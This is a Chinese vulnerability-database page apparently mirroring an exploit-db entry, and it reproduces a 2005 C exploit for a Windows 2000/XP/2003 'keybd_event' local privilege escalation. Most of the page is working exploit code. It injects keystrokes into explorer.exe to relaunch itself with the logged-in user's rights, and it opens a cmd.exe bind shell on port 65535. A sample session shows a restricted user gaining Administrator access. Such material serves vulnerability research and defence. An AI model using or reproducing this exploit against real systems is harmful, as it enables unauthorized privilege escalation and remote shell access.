Microsoft Windows – ‘keybd_event’ Local Privilege Escalation

Microsoft Windows – ‘keybd_event’ Local Privilege Escalation

漏洞ID 1055370 漏洞类型
发布时间 2005-09-06 更新时间 2005-09-06
图片[1]-Microsoft Windows – ‘keybd_event’ Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-Microsoft Windows – ‘keybd_event’ Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1197
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * Microsoft Windows keybd_event validation vulnerability.
 *          Local privilege elevation
 *
 * Credits:    Andres Tarasco ( aT4r _@_ haxorcitos.com )
 *             Iñaki Lopez    ( ilo _@_ reversing.org )
 *
 * Platforms afected/tested:
 *
 *     - Windows 2000
 *     - Windows XP
 *     - Windows 2003
 *
 *
 * Original Advisory: http://www.haxorcitos.com
 *                    http://www.reversing.org  
 *
 * Exploit Date: 08 / 06 / 2005
 *
 * Orignal Advisory:
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 * Attack Scenario:
 *
 * a) An attacker who gains access to an unprivileged shell/application executed
 * with the application runas.
 * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
 *
 * Impact:
 *
 * Due to an invalid keyboard input validation, its possible to send keys to any
 * application of the Desktop.
 * By sending some short-cut keys its possible to execute code and elevate privileges
 * getting loggued user privileges and bypass runas/service security restriction.
 *
 * Exploit usage:
 *
 * C:>whoami
 * AQUARIUSAdministrador
 *
 * C:>runas /user:restricted cmd.exe
 * Escribir contraseña para restricted:
 * Intentando iniciar "cmd.exe" como usuario "AQUARIUSrestricted"...
 *
 *
 * Microsoft Windows 2000 [Versión 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:WINNTsystem32>cd 
 *
 * C:>whoami
 * AQUARIUSrestricted
 *
 * C:>tlist.exe |find "explorer.exe"
 * 1140 explorer.exe      Program Manager
 *
 * C:>c:keybd.exe 1140
 * HANDLE Found. Attacking =)
 *
 * C:>nc localhost 65535
 * Microsoft Windows 2000 [Versión 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:>whoami
 * whoami
 * AQUARIUSAdministrador
 *
 *
 * DONE =)
 *
 */

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define HAXORCITOS 65535
unsigned int pid = 0;
char buf[256]="";

/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
	DWORD hwndid;
    int i;


	GetWindowThreadProcessId(hwnd,&hwndid);

	if (hwndid == pid){
    /*
      Replace keybd_event with SendMessage() and PostMessage() calls 
    */
        printf("HANDLE Found. Attacking =)n");
        SetForegroundWindow(hwnd);
        keybd_event(VK_LWIN,1,0,0);
        keybd_event(VkKeyScan('r'),1,0,0);
        keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
        keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
        for(i=0;i<strlen(buf);i++) {
            if (buf[i]==':') {
                keybd_event(VK_SHIFT,1,0,0);
                keybd_event(VkKeyScan(buf[i]),1,0,0);
                keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
                keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
            } else {
                if (buf[i]=='\') {
                    keybd_event(VK_LMENU,1,0,0);
                    keybd_event(VK_CONTROL,1,0,0);
                    keybd_event(VkKeyScan('º'),1,0,0);
                    keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);
                    keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);
                    keybd_event(VkKeyScan('º'),1,KEYEVENTF_KEYUP,0);
                } else {
                    keybd_event(VkKeyScan(buf[i]),1,0,0);
                    keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
                }
            }
        }
        keybd_event(VK_RETURN,1,0,0);
        keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);
        exit(1);
    }
}
/**************************************************************/

int BindShell(void) { //Bind Shell. POrt 65535

	SOCKET				s,s2;
	STARTUPINFO			si;
    PROCESS_INFORMATION pi;
	WSADATA				HWSAdata;
	struct				sockaddr_in sa;
	int					len;

	if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
	if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); }

    sa.sin_family		= AF_INET;
    sa.sin_port			= (USHORT)htons(HAXORCITOS);
    sa.sin_addr.s_addr	= htonl(INADDR_ANY);
    len=sizeof(sa);
    if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); }
    if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
    s2 = accept(s,(struct sockaddr *)&sa,&len);
    closesocket(s);

	ZeroMemory( &si, sizeof(si) );  ZeroMemory( &pi, sizeof(pi) );
	si.cb			= sizeof(si);
	si.wShowWindow  = SW_HIDE;
    si.dwFlags		=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdInput	= (void *) s2; // SOCKET
    si.hStdOutput	= (void *) s2;
    si.hStdError	= (void *) s2;
    if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {
        doFormatMessage(GetLastError());
        return(-1);
    }

    WaitForSingleObject( pi.hProcess, INFINITE );
	closesocket(s);
	closesocket(s2);
    printf("SALIMOS...n");
    Sleep(5000);
    return(1);


}
/**************************************************************/
void main(int argc, char* argv[])
{
    HWND console_wnd = NULL;
    
	if (argc >= 2) {
        pid = atoi (argv[1]);
        strncpy(buf,argv[0],sizeof(buf)-1);
	    EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
    } else {
        BindShell();
    }
}
/**************************************************************/

// milw0rm.com [2005-09-06]

相关推荐: Mini SQL w3-msql漏洞。

Mini SQL w3-msql漏洞。 漏洞ID 1105515 漏洞类型 其他 发布时间 1999-08-18 更新时间 2005-05-02 CVE编号 CVE-1999-0753 CNNVD-ID CNNVD-199908-029 漏洞平台 Multip…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享